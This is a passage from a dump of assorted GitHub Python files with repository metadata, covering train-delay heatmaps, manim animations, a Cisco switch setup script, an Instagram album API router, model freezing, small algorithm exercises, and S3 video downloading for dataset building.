pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport datetime\n\nTICK_COLOURS = 'black'\n\n\n# In[263]:\n\n\n# date field was shadowing datetime.date class\ndf = pd.read_csv('delay_history.csv', \n                 parse_dates = ['date', 'scheduled_depart', 'scheduled_arrive', 'actual_arrive']).rename(columns={'date':'date_'})\ndf = df.assign(day_name = df.date_.dt.day_name())\nfor hhmm_col in ['scheduled_depart', 'scheduled_arrive', 'actual_arrive']:\n    df[hhmm_col] = pd.to_datetime(df[hhmm_col], format = '%H:%M').dt.time\n\n\n# In[264]:\n\n\ndef plot_heatmap(from_station, time_lower, time_upper, agg_col, fmt, operator = 'LM'):\n    \n    metrics = {\n        'minutes_late' : 'Avg. 
minutes late',\n        'on_time' : 'Percentage of trains on time',\n        'cancelled' : 'Percentage of trains cancelled'\n    }\n    \n    fig = plt.figure(figsize = (15,15))\n    ax = fig.add_subplot(111)\n    \n    _ = sns.heatmap(df.loc[(df.operator == operator) & (df.from_station == from_station) & (df.scheduled_depart > pd.to_datetime(time_lower).time()) & (df.scheduled_depart < pd.to_datetime(time_upper).time())].pivot_table(values = agg_col,\n                                                                                                                                                                                                                              index = 'scheduled_depart',\n                                                                                                                                                                                                                              columns = 'day_name').dropna()[['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday']],\n                    annot = True,\n                    cmap = 'YlOrRd',\n                    alpha = .5,\n                    fmt = fmt,\n                    linecolor = None,\n                    square = True,\n                    cbar = False,\n                    ax = ax\n                   )\n    \n    cbar = ax.figure.colorbar(ax.collections[0])\n    #cbar.set_label('Avg. mins late', color = TICK_COLOURS, size = '12')\n    for l in cbar.ax.yaxis.get_ticklabels():\n        l.set_color(TICK_COLOURS)\n    \n    plt.title('Operator: {}\\nDeparting from: {}\\nMetric: {}'.format(operator, from_station, metrics[agg_col]), color = TICK_COLOURS, size = 15)\n    ax.tick_params(colors = TICK_COLOURS, labelsize = 12)\n    ax.set_xlabel('Day of week', color = TICK_COLOURS, size = 12)\n    ax.set_ylabel('Train departure', color = TICK_COLOURS, size = 12)\n    \n    ax.plot()\n\n\n# In[265]:\n\n\nif __name__ == '__main__':\n    plot_heatmap('HRW', '07:00', '09:30', 'minutes_late', '.1f')\n    plot_heatmap('EUS', '17:00', '19:30', 'minutes_late', '.1f')\n    plot_heatmap('HRW', '07:00', '09:30', 'cancelled', '.1%')\n    plot_heatmap('EUS', '17:00', '19:30', 'cancelled', '.1%')\n    plot_heatmap('HRW', '07:00', '09:30', 'on_time', '.1%')\n    plot_heatmap('EUS', '17:00', '19:30', 'on_time', '.1%')\n\n","repo_name":"nhols/commute_delay","sub_path":"plot_heatmap.py","file_name":"plot_heatmap.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69846822565","text":"from manimlib.imports import *\n\n'''\nThe code in this file was provided by members of the manim chat group; it was actually written by @Elteoremadebeethoven(https://github.com/Elteoremadebeethoven)\nfrom @Elteoremadebeethoven(https://github.com/Elteoremadebeethoven)\n'''\n\ndef return_random_from_word(word):\n    \"\"\"\n    This function receives a TextMobject, \n    obtains its length: \n    len(TextMobject(\"Some text\"))\n    and returns a random list, example:\n\n    INPUT: word = TextMobject(\"Hello\")\n           length = len(word) # 5\n           rango = list(range(length)) # [0,1,2,3,4]\n\n    OUTPUT: [3,0,4,2,1] # Random list\n    \"\"\"\n    rango = list(range(len(word)))\n    random.shuffle(rango)\n    return rango\n\ndef return_random_direction(word):\n    \"\"\"\n    This function returns a list of random UP or DOWN:\n    [UP,UP,DOWN,UP,DOWN,DOWN,...]\n    \"\"\"\n    return [random.choice([UP,DOWN]) for _ in range(len(word))]\n\ndef get_random_coord(r_x,r_y,step_x,step_y):\n    \"\"\"\n    Given two ranges (a, b) and (c, d), this function returns an \n    intermediate array (x, y) such that \"x\" belongs to (a, b) \n    and \"y\" belongs to (c, d).\n    \"\"\"\n    range_x = list(range(r_x[0],r_x[1],step_x))\n    range_y = list(range(r_y[0],r_y[1],step_y))\n    select_x = random.choice(range_x)\n    select_y = random.choice(range_y)\n    return np.array([select_x,select_y,0])\n\ndef return_random_coords(word,r_x,r_y,step_x,step_y):\n    \"\"\"\n    This function returns a random coordinate array, \n    given the length of a TextMobject\n    \"\"\"\n    rango = range(len(word))\n    return [word.get_center() + get_random_coord(r_x,r_y,step_x,step_y) for _ in rango]\n\n\nclass WriteRandom(LaggedStart):\n    CONFIG = {\n        \"lag_ratio\":0.1,\n        \"run_time\":2.5,\n        \"anim_kwargs\":{},\n        
\"anim_type\":Write\n }\n def __init__(self,text,**kwargs):\n digest_config(self, kwargs)\n super().__init__(*[\n self.anim_type(text[i],**self.anim_kwargs)\n for i in return_random_from_word(text)\n ])\n\nclass UnWriteRandom(WriteRandom):\n CONFIG = {\n \"anim_kwargs\": {\n \"rate_func\": lambda t: smooth(1-t)\n },\n \"remover\": True,\n }\n\nclass FadeInRandom(WriteRandom):\n CONFIG = {\n \"anim_type\": FadeIn\n }\n\nclass FadeOutRandom(WriteRandom):\n CONFIG = {\n \"anim_type\": FadeOut\n }\n\nclass GrowRandom(WriteRandom):\n CONFIG = {\n \"anim_type\": GrowFromCenter\n }\n\nclass UnGrowRandom(GrowRandom):\n CONFIG = {\n \"anim_kwargs\": {\n \"rate_func\": lambda t: smooth(1-t),\n },\n \"remover\": True,\n }\n\nclass FadeInFromRandom(LaggedStart):\n CONFIG = {\n \"lag_ratio\":0.08,\n \"anim_type\":FadeInFrom,\n \"anim_kwargs\":{}\n }\n def __init__(self,text,**kwargs):\n digest_config(self, kwargs)\n super().__init__(*[\n self.anim_type(text[i],d,**self.anim_kwargs)\n for i,d in zip(return_random_from_word(text),return_random_direction(text))\n ])\n\nclass FadeOutFromRandom(FadeInFromRandom):\n CONFIG = {\n \"anim_type\":FadeOutAndShiftDown\n }\n\nclass GrowFromRandom(LaggedStart):\n CONFIG = {\n \"lag_ratio\":0.2,\n \"anim_kwargs\":{}\n }\n def __init__(self,text,r_x=[-2,3],r_y=[-2,3],step_x=1,step_y=1,**kwargs):\n digest_config(self, kwargs)\n super().__init__(*[\n GrowFromPoint(text[i],d,**self.anim_kwargs)\n for i,d in zip(return_random_from_word(text),return_random_coords(text,r_x,r_y,step_x,step_y))\n ])\n\nclass UnGrowFromRandom(GrowFromRandom):\n CONFIG = {\n \"anim_kwargs\": {\n \"rate_func\": lambda t: smooth(1-t)\n },\n \"remover\": True\n }\n","repo_name":"cigar666/my_manim_projects","sub_path":"my_utils/anim_effects.py","file_name":"anim_effects.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"52"} +{"seq_id":"9025448938","text":"OPERATORS = [\"+\",\"-\",\"*\"]\nUNARY_OPERATOR_RANKING = 4\n\ndef get_ranking(operator):\n if operator in OPERATORS:\n return OPERATORS.index(operator)\n return 0\n\ndef value(l_input,l_output,ranking):\n element = l_input.pop(0)\n if element in OPERATORS:\n value(l_input,l_output,UNARY_OPERATOR_RANKING)\n l_output.append((\"uo\",element)) # unary operator\n else:\n l_output.append((\"op\",element)) # operand\n while l_input and get_ranking(l_input[0])>=ranking:\n operator = l_input.pop(0)\n value(l_input,l_output,get_ranking(operator))\n l_output.append((\"bo\",operator)) # binary operator\n return\n\n#a+-b*c-d\ninfix = [\"a\",\"+\",\"-\",\"b\",\"*\",\"-\",\"c\",\"-\",\"d\"]\n\noutput = []\nvalue(infix,output,0)\n","repo_name":"Shildifreak/Shildimon","sub_path":"ShildiEngine/modules/test/reversed_polnish.py","file_name":"reversed_polnish.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39521933211","text":"# Works for Cisco ios devices\n\nimport serial\nfrom netmiko import ConnectHandler\n\n# Establish serial connection settings\n\ndevice = {\n \"device_type\": \"cisco_ios_serial\",\n \"username\": \"cisco\",\n \"password\": \"cisco\",\n \"secret\": \"cisco\",\n \"fast_cli\": False,\n \"conn_timeout\": 30.0,\n \"serial_settings\": {\n \"baudrate\": serial.Serial.BAUDRATES[12],\n \"bytesize\": serial.EIGHTBITS,\n \"parity\": serial.PARITY_NONE,\n \"stopbits\": serial.STOPBITS_ONE,\n \"port\": \"/dev/cu.usbserial-A9CB9ZHA\",\n },\n}\n\n# Connect to 
device and verify by performing the show version command\n\nprint(\"Connecting...\")\n# Keep the session open (not a 'with' block) so conn can be reused for the config push below\nconn = ConnectHandler(**device)\nprint(\"Connected\")\nif not conn.check_enable_mode():\n    conn.enable()\noutput = conn.send_command(\"show version\")\noutput = conn.send_command(\"show version\")\nprint(output) # Capture success or failure instead of printing to the screen\n\n# Enable a default remote connection for advanced configurations/automation\n\"\"\"\n- Connect to the vlan\n 'conf t'\n 'interface vlan 1'\n- Set a management IP/subnet\n- Set the default gateway\n- Assign hostname and domain name?\n- Set user and password\n- Enable SSH\n- Test remote connection\n\"\"\"\n\ndefault_mgmt = [\n    'conf t',\n    'hostname lasC3560X-test',\n    'ip domain-name lasC3560X-test.com',\n    'username techno privilege 15 secret test123',\n    'crypto key generate rsa',\n    '2048',\n    'ip ssh version 2',\n    'vlan 128',\n    'interface vlan 128',\n    'ip address 10.9.128.99 255.255.255.0',\n    'int gi0/47',\n    'switchport mode access',\n    'switchport access vlan 128',\n    'no shut',\n    'exit'\n\n]\n\ndef_mgmt_conf = conn.send_config_set(default_mgmt)\ndef_mgmt_output = conn.send_command(\"show ip arp\")\nprint(def_mgmt_output)\nconn.disconnect()\n\nr_device = {\n'device_type': 'cisco_ios',\n 'host': '10.9.128.99',\n 'username': 'cisco',\n 'password': 'cisco',\n 'port': 20022,\n}\n\nprint(\"Connecting...\")\n# Same pattern as above: keep the SSH session open until the explicit disconnect\nssh = ConnectHandler(**r_device)\nprint(\"Connected\")\nif not ssh.check_enable_mode():\n    ssh.enable()\nssh_output = ssh.send_command(\"show version\")\nssh_output = ssh.send_command(\"show version\")\nprint(ssh_output)\nssh.disconnect()\n# Create Customer's environment\n","repo_name":"Tracks2DevOps/Networking_Scripts","sub_path":"serial_connect2.py","file_name":"serial_connect2.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20846153684","text":"from typing import List, Optional\nfrom pathlib import Path\nimport json\n\nfrom fastapi import APIRouter, Depends, File, UploadFile, Form\nfrom instagrapi.types import Media, Location, Usertag\n\nfrom dependencies import ClientStorage, get_clients\nfrom helpers import album_upload_post\n\n\nrouter = APIRouter(\n    prefix=\"/album\",\n    tags=[\"album\"],\n    responses={404: {\"description\": \"Not found\"}},\n)\n\n\n@router.post(\"/download\", response_model=List[Path])\nasync def album_download(sessionid: str = Form(...),\n                         media_pk: int = Form(...),\n                         folder: Optional[Path] = Form(\"\"),\n                         clients: ClientStorage = Depends(get_clients)) -> List[Path]:\n    \"\"\"Download photo using media pk\n    \"\"\"\n    cl = clients.get(sessionid)\n    result = cl.album_download(media_pk, folder)\n    return result\n\n\n@router.post(\"/download/by_urls\", response_model=List[Path])\nasync def album_download_by_urls(sessionid: str = Form(...),\n                                 urls: List[str] = Form(...),\n                                 folder: Optional[Path] = Form(\"\"),\n                                 clients: ClientStorage = Depends(get_clients)) -> List[Path]:\n    \"\"\"Download photo using URL\n    \"\"\"\n    cl = clients.get(sessionid)\n    result = cl.album_download_by_urls(urls, folder)\n    return result\n\n\n@router.post(\"/upload\", response_model=Media)\nasync def album_upload(sessionid: str = Form(...),\n                       files: List[UploadFile] = File(...),\n                       caption: str = Form(...),\n                       usertags: Optional[List[str]] = Form([]),\n                       location: Optional[Location] = Form(None),\n                       clients: ClientStorage = Depends(get_clients)\n                       ) -> Media:\n    \"\"\"Upload album to feed\n    \"\"\"\n    cl = clients.get(sessionid)\n    \n    
usernames_tags = []\n for usertag in usertags:\n usertag_json = json.loads(usertag)\n usernames_tags.append(Usertag(user=usertag_json['user'], x=usertag_json['x'], y=usertag_json['y']))\n \n return await album_upload_post(\n cl, files, caption=caption,\n usertags=usernames_tags,\n location=location)\n","repo_name":"adw0rd/instagrapi-rest","sub_path":"routers/album.py","file_name":"album.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":282,"dataset":"github-code","pt":"52"} +{"seq_id":"38815625283","text":"import tensorflow as tf\nfrom tensorflow.python.tools import freeze_graph\nfrom tensorflow.python.tools import optimize_for_inference_lib\nfrom tensorflow.python.framework import meta_graph\ndir(tf.contrib)\n\nsaved_graph_name = './models/best/ner.pbtxt'\nsaved_ckpt_name = './models/best/model.ckpt-11926'\ninput_node_name = 'encoder_input_data:0'\nout_node_name = 'NER_output'\n\noutput_frozen_graph_name = '../ner_corpus/ner.pb'\n\nfreeze_graph.freeze_graph(input_graph=saved_graph_name,\\\n\t\t\t\t\t\tinput_saver='', \\\n\t\t\t\t\t\tinput_binary=False, \\\n\t\t\t\t\t\tinput_checkpoint=saved_ckpt_name, \\\n\t\t\t\t\t\toutput_node_names=out_node_name, \\\n\t\t\t\t\t\trestore_op_name='', filename_tensor_name='', \\\n\t\t\t\t\t\toutput_graph=output_frozen_graph_name, \\\n\t\t\t\t\t\tclear_devices=True, initializer_nodes='')\n\n# optimized model is not ready, there's still bug in the function.\n'''\ninput_graph_def = tf.GraphDef()\nwith tf.gfile.Open(output_frozen_graph_name, 'r') as f:\n data = f.read()\n input_graph_def.ParseFromString(data)\n\noutput_graph_def = optimize_for_inference_lib.optimize_for_inference(input_graph_def, [], [out_node_name], tf.string.as_datatype_enum)\n\nf = tf.gfile.FastGFile(optimized_model_name, 'w')\nf.write(output_graph_def.SerializeToString())\n'''\n","repo_name":"BlueSummerTrain/AttentionNER","sub_path":"ner/freeze_graph.py","file_name":"freeze_graph.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"40342367154","text":"from itertools import product\n\nh, w = map(int, input().split())\nboard = [list(map(int, input().split())) for _ in range(h)]\nsa = 2 * h * w\nfor row, col in product(range(h), range(w)):\n n = board[row][col]\n sa += n if row == 0 else abs(n - board[row - 1][col])\n sa += n if col == 0 else abs(n - board[row][col - 1])\n if row == h - 1: sa += n\n if col == w - 1: sa += n\nprint(sa)\n","repo_name":"SamProkopchuk/coding-problems","sub_path":"hackerrank/3d-surface-area/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15864273599","text":"def countingsort(arr,exp1):\r\n n=len(arr)\r\n op=[0]*(n)\r\n count=[0]*(10)\r\n for i in range(0,n):\r\n index=(arr[i]/exp1)\r\n count[int((index)%10)]+=1\r\n for i in range(1,10):\r\n count[i]+=count[i-1]\r\n i=n-1\r\n while i>=0:\r\n index=(arr[i]/exp1)\r\n op[count[int((index)%10)]-1]=arr[i]\r\n count[int((index)%10)]-=1\r\n i-=1\r\n i=0\r\n for i in range(0,len(arr)):\r\n arr[i]=op[i]\r\ndef radix(arr):\r\n max1=max(arr)\r\n exp=1\r\n while max1/exp>0:\r\n countingsort(arr,exp)\r\n exp*=10\r\nprint(\"enter the array elements:\")\r\nnums=list(map(int,input().split()))\r\nradix(nums)\r\nfor i in range(len(nums)):\r\n print(nums[i],end=\" \")\r\n 
\r\n","repo_name":"Jahnavi-Chunduru/-CrackYourInternship","sub_path":"radix sort 83.py","file_name":"radix sort 83.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5633762527","text":"import csv\nimport itertools\n\nimport pyquery\n\n\ndef extract_saints(d, position):\n result = []\n\n selector = f\"div.article__text > ul:nth-child({position})> li > a\"\n p = d(selector)\n\n for node in p:\n result.append(node.text)\n return result\n\n\ndef saints():\n # https://parenting.pl/imiona-swietych-swiete-imiona-zenskie-i-meskie\n d = pyquery.PyQuery(filename=\"data/święci.html\")\n female_saints = extract_saints(d, 12)\n male_saints = extract_saints(d, 16)\n return set(female_saints), set(male_saints)\n\n\ndef td(d, td_class):\n selector = f\"body > div[align=center] > table > tbody > tr > td.{td_class}\"\n p = d(selector)\n texts = []\n for node in p:\n texts.append(node.text)\n return texts\n\n\ndef process_names(names):\n first = True\n processed_names = []\n for name in names:\n if first:\n first = False\n continue\n processed_names.append(name)\n return processed_names\n\n\ndef process_patronages(patronages):\n first = True\n processed_patronages = []\n for patronage in patronages:\n if first:\n first = False\n continue\n processed_patronage = patronage.removeprefix(\"Patron \")\n processed_patronage = processed_patronage.removeprefix(\"Patronka \")\n processed_patronages.append(processed_patronage)\n return processed_patronages\n\n\ndef patrons():\n # https://patroni.waw.pl\n d = pyquery.PyQuery(filename=\"data/patroni.html\")\n names = td(d, \"a\")\n patronages = td(d, \"b\")\n\n processed_names = process_names(names)\n processed_patronages = process_patronages(patronages)\n\n return list(zip(processed_names, processed_patronages))\n\n\ndef possible_patrons(patron_names, name):\n result = []\n for patron in patron_names:\n if name in patron:\n result.append(patron)\n return result\n\n\ndef merge(saints_data, patrons_data):\n name_to_patronage = {name: patronage for name, patronage in patrons_data}\n patron_names = [name for name, _ in patrons_data]\n result = []\n for name in saints_data:\n try:\n local_patrons = possible_patrons(patron_names, name)\n for local_patron in local_patrons:\n patronage = name_to_patronage[local_patron]\n result.append((local_patron, patronage))\n except KeyError as exception:\n missing = exception.args[0]\n print(f\"Not found: {missing}.\")\n return result\n\n\ndef merged(saints_data, patrons_data):\n female_saints_data, male_saints_data = saints_data\n female_merged = merge(female_saints_data, patrons_data)\n male_merged = merge(male_saints_data, patrons_data)\n return female_merged, male_merged\n\n\ndef main():\n print(\"Starting...\")\n\n print(\"Saints...\")\n saints_data = saints()\n female_saints_data, male_saints_data = saints_data\n print(\"Female...\")\n print(female_saints_data)\n print(\"Male...\")\n print(male_saints_data)\n print()\n\n print(\"Patrons...\")\n patrons_data = patrons()\n print(patrons_data)\n print()\n\n print(\"Merged...\")\n merged_data = merged(saints_data, patrons_data)\n print(merged_data)\n female_merged_data, male_merged_data = merged_data\n print()\n\n print(\"Saving...\")\n with open(\"extracted.csv\", \"w\") as csv_file:\n csv_writer = csv.writer(csv_file)\n for name, patronage in itertools.chain(female_merged_data, male_merged_data):\n csv_writer.writerow((name, patronage))\n print()\n\n 
print(\"Ending...\")\n\n\nmain()\n","repo_name":"wieczorek1990/patrons","sub_path":"extractor/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4063079425","text":"import os\nimport sys\nimport mysql.connector\nimport boto3\nfrom dotenv import load_dotenv\nfrom visua_to_coco import convert_to_coco\nimport json\nfrom tqdm import tqdm\nimport cv2\n\ndef import_from_S3(S3directory, filename, outputDirectory=None):\n try:\n\n # Access specific S3 bucket\n bucket_name = os.getenv('AWS_BUCKET')\n\n # Create an S3 client\n s3 = boto3.client('s3')\n\n # Construct the source path\n source = S3directory + filename\n\n # Check if the file exists in S3\n response = s3.head_object(Bucket=bucket_name, Key=source)\n error_code = getattr(response, 'response', {}).get('Error', {}).get('Code')\n output_directory = os.path.join(outputDirectory, '') if outputDirectory else ''\n\n if error_code == '404':\n response = s3.head_object(Bucket=bucket_name, Key=source.replace('visua/', ''))\n error_code = getattr(response, 'response', {}).get('Error', {}).get('Code')\n\n if error_code == '404':\n print(source, \"not found\")\n return False\n else: \n print(bucket_name, source, output_directory + filename)\n s3.download_file(bucket_name, source.replace('visua/', ''), output_directory + filename)\n return True\n\n\n print(bucket_name, source, output_directory + filename)\n s3.download_file(bucket_name, source, output_directory + filename)\n\n # Return True to indicate successful download\n return True\n \n except FileNotFoundError:\n print(f\"File not found on S3: {filename}\")\n return False\n except Exception as e:\n print(f\"Error occurred during S3 download: {str(e)}\")\n # Return False to indicate failure in download\n return False\n\ndef main():\n try:\n load_dotenv()\n\n conn = mysql.connector.connect(\n host=os.getenv('DB_HOST'),\n user=os.getenv('DB_USERNAME'),\n password=os.getenv('DB_PASSWORD'),\n database=os.getenv('DB_DATABASE'),\n port=os.getenv('DB_PORT')\n )\n\n cursor = conn.cursor()\n number_of_videos = 1000\n query = \"SELECT logograb_videos.url, logograb_video_analysis.json_url FROM logograb_videos INNER JOIN logograb_video_analysis ON logograb_videos.id = logograb_video_analysis.video_id ORDER BY logograb_videos.id DESC LIMIT \" + str(number_of_videos) + \";\"\n print(query)\n cursor.execute(query)\n\n result = cursor.fetchall()\n image_id = 3000\n\n output_directory = sys.argv[1] if len(sys.argv) > 1 else None\n\n for video_url, analysis_url in result:\n found = True\n print(video_url, analysis_url)\n if analysis_url is not None:\n import_from_S3(S3directory=\"\", filename=analysis_url, outputDirectory=output_directory)\n json_file_path = analysis_url\n # existing_coco_file = \"existing_coco.json\" # Specify the path to an existing COCO JSON file if available\n with open(json_file_path) as f:\n input_data = json.load(f)\n\n if video_url is not None:\n filename = video_url.replace('http://spect8-static.s3.amazonaws.com/', '')\n if not import_from_S3(S3directory=\"\", filename=filename, outputDirectory=output_directory):\n continue\n\n video_path = os.path.join(output_directory, filename) # Specify the path to the corresponding video file\n\n image_id = convert_to_coco(input_data, os.path.join(output_directory, 'images'), video_path, image_id)\n\n video_file = os.path.join(video_path, os.path.basename(filename))\n\n if not os.path.isfile(video_file):\n 
print(f\"Video file '{video_file}' not found.\")\n continue\n\n try:\n # Open the video file\n cap = cv2.VideoCapture(video_file)\n\n # Check if the video file was successfully opened\n if not cap.isOpened():\n print(f\"Failed to open video file '{video_file}'\")\n continue\n\n # Read frames from the video\n while True:\n ret, frame = cap.read()\n\n # Check if a frame was successfully read\n if not ret:\n print(\"Failed to capture frame from video\")\n break\n\n # Process the frame here\n\n # Release the video file capture\n cap.release()\n os.remove(video_file)\n\n except Exception as e: \n print(f\"An error occurred while processing the video: {str(e)}\")\n\n except Exception as e:\n print(f\"An error occurred: {str(e)}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ThomasJRye/Foocus-Logodetection","sub_path":"visua_data_maker.py","file_name":"visua_data_maker.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70137725286","text":"import os\nimport sys\n\n\ndef ler_arquivo(path):\n if not os.path.exists(path):\n print(\"arquivo {} nao existe\".format(path))\n return None\n else:\n _file = open(path, \"r\")\n conteudo = _file.readlines()\n _file.close()\n return conteudo\n\n\ndef read_meta_data(diretorio):\n data = open(diretorio,\"r\")\n meta_data=[]\n for line in data:\n line_data = line.split('\\t')\n meta_data.append((line_data[0],line_data[1],line_data[2]))\n data.close()\n return meta_data\n\n\ndef grava_saida(resultado, arquivoSaida):\n if not os.path.exists(arquivoSaida):\n print(\"arquivo {} nao existe, foi criado agora\".format(arquivoSaida))\n\n arquivo = open(arquivoSaida, \"w\")\n for item in resultado:\n arquivo.writelines(item + \"\\n\")\n arquivo.close()\n\n\n\ncaminho_do_arquivo = r\"Gastos.txt\"\n# caminho_do_arquivo = \"fat.txt\"\ndata = ler_arquivo(caminho_do_arquivo)\n\nif data is None:\n sys.exit(-1)\n\ncont = 0\nresultado = []\nlinha = \"\"\nfor x in data:\n linha += \" \" + x[:len(x) - 1] + \"\\t\"\n cont += 1\n if cont == 2:\n resultado.append(linha)\n cont =0\n linha = \"\"\n\n\ngrava_saida(resultado, \"saida.txt\")\n\n\n\n\n\n","repo_name":"BrunoBog/nuBank","sub_path":"src/formatar fatura.py","file_name":"formatar fatura.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74670156323","text":"# coding: utf-8\r\nimport argparse\r\nfrom docreader import GetDocs\r\n\r\nimport index\r\n\r\n#Параметры командной строки, соответствующие массиву COMPRESSION_CLASSES\r\nCOMPRESSION_CLASSES_NAMES = ['varbyte', 'simple9']\r\n\r\ndef parse_command_line():\r\n parser = argparse.ArgumentParser(description='compressed documents reader')\r\n parser.add_argument('compression', nargs=1, default='varbyte', \r\n choices=['varbyte', 'simple9'], \r\n help='Type of index compression (\"varbyte\" or \"simple9\"')\r\n parser.add_argument('files', nargs='+', help='Input files (.gz or plain) to process')\r\n args = parser.parse_args()\r\n return args.compression[0], args.files #compression[0] - compression is an array ['varbyte'] or ['simple9']\r\n \r\n##main\r\ncompression, filenames = parse_command_line()\r\ncompression_object = index.COMPRESSION_CLASSES[COMPRESSION_CLASSES_NAMES.index(compression)]\r\ndocs = GetDocs(filenames)\r\n\r\n##Сохраняем URL в порядке загрузки\r\nurls_file = open('urls.txt', 'w')\r\nidx = index.NewIndex(compression_object)\r\nfor docid, doc in 
enumerate(docs):\r\n    idx.IndexDocument(docid, doc.text)\r\n    urls_file.write(doc.url+'\\n')\r\nurls_file.close()\r\nidx.SaveToFile('test.idx.bin', 'test.dic.bin')\r\n","repo_name":"Fen99/TehnoSphere","sub_path":"02_Info/hw02/src/index_main.py","file_name":"index_main.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8833740712","text":"import numpy as np\r\nfrom alexnet import alexnet\r\nfrom tensorflow.keras.callbacks import TensorBoard\r\nfrom random import shuffle\r\nimport cv2\r\nimport pandas\r\nimport tensorflow as tf\r\n\r\nWIDTH = 150\r\nHEIGHT = 150\r\n\r\ngpu_options = tf.GPUOptions(allow_growth=True)\r\nsession = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=gpu_options))\r\n\r\nMODEL_NAME = 'Last_model.model'\r\ntensorboard = TensorBoard(log_dir = 'logs_Last_model'.format(MODEL_NAME))\r\ntrain_data = np.load('Car-dataset/Final_data_balanced.npy', allow_pickle=True)\r\n\r\nshuffle(train_data)\r\nshuffle(train_data)\r\n\r\ntrain = train_data[:-150]\r\ntest = train_data[-150:]\r\n\r\nprint(len(np.array([i[0] for i in train])))\r\nprint(len(np.array([i[0] for i in train]).reshape(-1,WIDTH,HEIGHT,3)))\r\n#print(len(np.array([i[1] for i in train])))\r\n\r\nX = np.array([i[0] for i in train]).reshape(-1,WIDTH,HEIGHT,3)\r\nY = [i[1] for i in train]\r\n\r\nshape = X.shape[1:]\r\nmodel = alexnet(shape)\r\n\r\nX = np.array(X)\r\nY = np.array(Y)\r\n\r\ntest_x = np.array([i[0] for i in test]).reshape(-1,WIDTH,HEIGHT,3)\r\ntest_y = [i[1] for i in test]\r\n\r\ntest_x = np.array(test_x)\r\ntest_y = np.array(test_y)\r\nmodel.fit(X, Y, batch_size=64, epochs=13, validation_data = (test_x,test_y),callbacks = [tensorboard])\r\nmodel.save(MODEL_NAME)\r\n\r\n\r\n","repo_name":"usman-vecho/SelfDrivingCar","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19891676948","text":"import sys\nsys.stdin = open('input.txt', 'r') \ninput = sys.stdin.readline \n#-------------------------------------------------------\nimport heapq\n\nn = int(input())\n\nheap = []\ncomputers = [0 for _ in range(n)]\ncnt = [0 for _ in range(n)]\ncom = 0\n\nfor _ in range(n):\n    p, q = map(int, input().split())\n    heapq.heappush(heap, [p, q])\n\nwhile heap:\n    p, q = heapq.heappop(heap)\n    for i in range(n):\n        if computers[i] <= p:\n            if computers[i] == 0: com += 1\n            computers[i] = q\n            cnt[i] += 1\n            break\n\nprint(com)\nfor i in cnt:\n    if i: print(i, end= \" \")","repo_name":"Al9-Mor9/Algo-Rehabilitation","sub_path":"Code/12764/12764_L.py","file_name":"12764_L.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28157796778","text":"import random\nfrom timeit import default_timer as timer\n\n\nprint(\"-\" * 38)\nprint(\" \" * 9 + \"GUESS THE NUMBER APP\")\nprint(\"-\" * 38)\n\nthe_number = random.randint(0, 100)\nthe_guess = -1\nstart_time = timer()\n\nwhile the_guess != the_number:\n\n    the_guess = input(\"Guess a number between 0 and 100: \")\n\n    try:\n        the_guess = int(the_guess)\n        if the_guess < 0 or the_guess > 100:\n            raise ValueError\n    except ValueError:\n        print(f\"'{the_guess}' is not a valid number! Try again!\")\n        continue\n\n    if the_guess == 42:\n        print(\"Yes! 
42 is always the correct answer!\")\n        break\n\n    if the_guess == the_number:\n        end_time = timer()\n        print(\n            f\"Awesome! You got it in {end_time - start_time:.1f} seconds!! Now go back to work!\"\n        )\n\n    if the_guess > the_number:\n        print(f\"Too high man!\")\n\n    if the_guess < the_number:\n        print(\"Too low man!\")\n","repo_name":"esinghroy/python-learning-cohort","sub_path":"malte/02_guess_that_number/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22176901890","text":"import spectra as spc\r\n\r\nFeI = {\"El\":0.9146,\"gf\":-4.318,\"lam\":640.0316,\"dep\":0.533,\"name\":\"Fe I\"}\r\nMyst = {\"El\": -1,\"gf\": 0,\"lam\":640.5763,\"dep\":0.058,\"name\":\"Myst\"}\r\nSiI = {\"El\":5.8709,\"gf\":-1.393,\"lam\":640.7291,\"dep\":0.155,\"name\":\"Si I\"}\r\nFeI2 = 